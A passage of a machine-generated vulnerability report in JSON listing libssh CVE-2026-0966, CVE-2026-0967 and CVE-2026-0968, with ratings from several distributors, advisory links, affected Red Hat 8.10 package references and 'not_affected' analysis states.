          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0966",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in libssh. The API function `ssh_get_hexa()` is vulnerable to a denial of service when processing zero-length input. This can be exploited remotely by an attacker during GSSAPI (Generic Security Service Application Program Interface) authentication if the server's logging verbosity is set to `SSH_LOG_PACKET (3)` or higher. Successful exploitation could lead to a self-Denial of Service of the per-connection daemon process.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0966"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7067"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0966"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0966.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0966"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0966"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0966.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0967",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.2,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1333
      ],
      "description": "A flaw was found in libssh. A remote attacker, by controlling client configuration files or known_hosts files, could craft specific hostnames that when processed by the `match_pattern()` function can lead to inefficient regular expression backtracking. This can cause timeouts and resource exhaustion, resulting in a Denial of Service (DoS) for the client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0967"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0967"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18160.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0967.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0967"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0967"
        },
        {
          "url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2026-0967.txt"
        }
      ],
      "published": "2026-03-26T21:17:00+00:00",
      "updated": "2026-06-17T10:11:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0968",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libssh in which a malicious SFTP (SSH File Transfer Protocol) server can exploit this by sending a malformed 'longname' field within an `SSH_FXP_NAME` message during a file listing operation. This missing null check can lead to reading beyond allocated memory on the heap. This can cause unexpected behavior or lead to a denial of service (DoS) due to application crashes.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0968"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0968"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
